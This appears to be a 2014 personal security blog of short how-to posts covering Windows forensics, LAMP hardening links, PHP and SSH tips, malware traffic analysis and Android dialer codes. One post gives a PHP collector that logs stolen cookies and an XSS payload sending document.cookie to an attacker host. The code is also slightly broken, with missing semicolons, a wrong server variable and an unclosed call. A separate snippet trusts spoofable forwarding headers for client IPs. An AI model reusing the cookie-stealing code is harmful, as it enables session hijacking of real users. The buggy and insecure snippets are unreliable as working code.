May 10, 2014

Comprehensive and useful Linux I/O stack diagram to find a bottleneck on server



 

Source: https://twitter.com/nixcraft/status/464369622565650433/photo/1



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

May 9, 2014

Howto: Enable 4G LTE On LG G2

1. Call with "*#*#4636#*#*"

2. Go to Phone Information

3. In Set Preferred Network Type box , set to  "LTE/GSM/WCDMA"

Or

1. Call with 3845#*802#
2. Go to LTE-Only
3. Modem Settings
4. RAT Selection
5. Select GSM / WCDMA / LTE auto 


Done


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Forensic Recycle Bin

XP
- C:\Recycler\<per-user-SID>\
- INFO2 file and delete file in each user folder.
- Deleted files are name DC####.
- INFO2 contain
   -- original filename
   --  size of original
   -- DC##### contain file content that was deleted
- INFO2 can analyze with Rifiuti (Free tool from McAfee)

Windows 7 
- C:\$Recycle.Bin\<per-user-SID>\
- No more INFO2
- When file was deleted it will create 2 file, $l and $R
  -- $l contain
    --- original filename
    ---  size of original
  -- $R contain file content that was deleted



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Harden LAMP

The L
There are lots of good guides available to help you out. This list may or may not help you depending on your distribution.
Center for Internet Security Benchmarks - Distribution specific for the major flavors CentOS Hardening HowTo - Follows closely to the CIS RHEL5 guide, but is a much easier read NIST SP800-123 - Guide to General Server Security NSA Hardening Factsheets - Not as recently updated as CIS, but still mostly applicable Tiger - Live System Security Auditing Software

The A
Apache can be fun to secure. I find it easier to harden the OS and maintain usability than either Apache or PHP.
Apache Server Hardening - This question on the IT Security sister site has lots of good information. Center for Internet Security Benchmarks - Again, Apache benchmarks. Apache Security Tips - Straight from the Apache project, it looks like it covers the basics DISA Hardening Checklist - Checklist from the DoD Information Assurance guys

The M
Center for Internet Security Benchmarks - Again, but for MySQL benchmarks OWASP MySQL Hardening General Security Guidelines - Basic checklist from the project devs

The P
This runs headlong into the whole idea of Secure Programming Practices, which is an entire discipline of its own. SANS and OWASP have a ridiculous amount of information on the subject, so I won't try to replicate it here. I will focus on the runtime configuration and let your developers worry about the rest. Sometimes the 'P' in LAMP refers to Perl, but usually PHP. I am assuming the latter.
Hardening PHP - Some minor discussion, also on IT Security SE site. Hardened PHP Project - Main project that produces Suhosin, an attempt to patch the PHP application to project against certain types of attacks. Hardening PHP With Suhosin - A brief HowTo specifically for Suhosin Hardening PHP from php.ini - Short, but not bad discussion on some of the security related runtime options


Source: http://www.garage4hackers.com/showthread.php?t=6013


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Simple source code for get cookie from XSS.

<?php
   $filename='xss.log'
   if(isset($_GET['cookie']))
   {
       $content = 'Host: '.$_SERVER['HTTP_POST'].PHP_EOL;
       $content = 'Remote Addr: '.$_SERVER['REMOTE_ADDR'].PHP_EOL;
       $content = 'Cookie: '.$_GET['cookie'].PHP_EOL;
       file_put_contents($filename,$content, FILE_APPEND | LOCK_EX)
   } else
   {
      $data = file_get_contents($filename);
      $convert = explode("\n",$data);
      for($i=0;$i<count($convert);$i++)
      {
         echo $convert[$i].'</br>';
      }
   }
?> 


XSS = <script>window.open("http://hackerwebsite.com/?cookie="+document.cookie</script>


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

May 8, 2014

Howto: Detect Client IP with PHP

This post just remind me for detect client IP with PHP.

if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
    $ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
    $ip = $_SERVER['REMOTE_ADDR'];
}



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Using X11(GUI) via SSH

1.  In /etc/ssh/ssh_config, you must set ForwardX11 and ForwardX11Trusted is set to yes
ForwardX11 yes

ForwardX11Trusted yes

2. Using ssh with -Y option
ssh -Y username@target -p port
 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

May 5, 2014

Windows Registry Forensics

Please see the full article in Source.
 
The Importance of HIVE Keys

HKEY_CLASSES_ROOT (HKCR):

Contains information in order for the correct program to open when executing a file with Windows Explorer.

HKEY_CURRENT_CONFIG (HKCC):

Provides information about the current hardware profile of the local computer system.

HKEY_LOCAL_MACHINE (HKLM):

The Registries that are listed within this hive give huge details about system memory and installed hardware and software. Sub keys can hold current configuration data, network logon, network security information, server names, and the location of a server.

HKEY_CURRENT_USER (HKCU):

Provides information about the preferences of the current user, including the settings of environment variables, data about program groups, colors, printers, network connections, and application preferences.

HKEY_USERS (HKU):

In this Registry hive, we can locate user-specific configuration information for all the currently active users on a computer. Now you will ask me how the HKEY_Current User will differ from this hive. The HKEY_CURRENT_USER is a shortcut to the HKEY_USERS sub-key corresponding to your SID (Security Identifier). Now what is SID? It is just a number used to identify user, group, and computer accounts in Windows. When you make changes in HKEY_CURRENT_USER, you’re making changes to the keys and values under the key within HKEY_USERS that’s named the same as your SID.



Source: http://resources.infosecinstitute.com/windows-registry-forensics/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Decrypt HTTPS Malware analysis with Fiddler

1. Install Fiddler from http://www.telerik.com/docs/default-source/fiddler/fiddler4setup.exe

2.  In Fiddler, Go to ToolsFiddler options, click on Decrypt SSL traffic and click on OK

3. Fake service for communicate to malware with REMnux( fakedns and INetSim)

4. Run malware and watch traffic

Source: http://www.aldeid.com/wiki/Fiddler#Example:_Decrypting_malware_HTTPS_traffic 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Volafox Mac OS X Memory Analysis Toolkit

Volafox is an open source toolkit that you can use for Mac OS X and BSD forensics. The tool is a python based and allows investigating security incidents and finding information for malwares and any malicious program on the system. Security analyst can have the following information using this tool:
  • MAC Kernel version, CPU, and memory specification
  • Mounted filesystems
  • Kernel Extensions listing
  • Process listing
  • Task listing (Finding process hiding)
  • Syscall table (Hooking detection)
  • Mach trap table (Hooking detection)
  • Network socket listing (Hash table)
  • Open files listing by process
  • Show Boot information
  • EFI System Table, EFI Runtime Services
  • Print a hostname

Source: http://www.sectechno.com/2014/05/04/volafox-mac-os-x-memory-analysis-toolkit/



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |